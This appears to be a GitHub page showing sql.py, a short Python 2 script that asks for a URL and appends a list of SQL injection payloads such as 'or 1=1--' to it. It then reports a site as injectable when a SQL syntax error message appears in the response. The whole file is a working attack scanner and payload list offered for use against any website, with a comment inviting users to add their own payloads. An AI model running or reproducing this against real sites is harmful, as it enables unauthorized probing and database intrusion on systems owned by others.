-
Notifications
You must be signed in to change notification settings - Fork 20
Expand file tree
/
Copy pathsql.py
More file actions
25 lines (24 loc) · 1023 Bytes
/
sql.py
File metadata and controls
25 lines (24 loc) · 1023 Bytes
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
import sys
import urllib
fullurl = raw_input("Url: ")
errormsg = "You have an error in your SQL syntax"
payloads = ["'admin'or 1=1 or ''='", "'=1\' or \'1\' = \'1\'", "'or 1=1", "'1 'or' 1 '=' 1", "'or 1=1#", "'0 'or' 0 '=' 0", "'admin'or 1=1 or ''='", "'admin' or 1=1", "'admin' or '1'='1", "'or 1=1/*", "'or 1=1--"] #whatever payloads you want here ## YOU CAN ADD YOUR OWN
errorr = "yes"
for payload in payloads:
try:
payload = payload
resp = urllib.urlopen(fullurl + payload)
body = resp.read()
fullbody = body.decode('utf-8')
except:
print "[-] Error! Manually check this payload: " + payload
errorr = "no"
#sys.exit()
if errormsg in fullbody:
if errorr == "no":
print "[-] That payload might not work!"
errorr = "yes"
else:
print "[+] The website is SQL injection vulnerable! Payload: " + payload
else:
print "[-] The website is not SQL injection vulnerable!"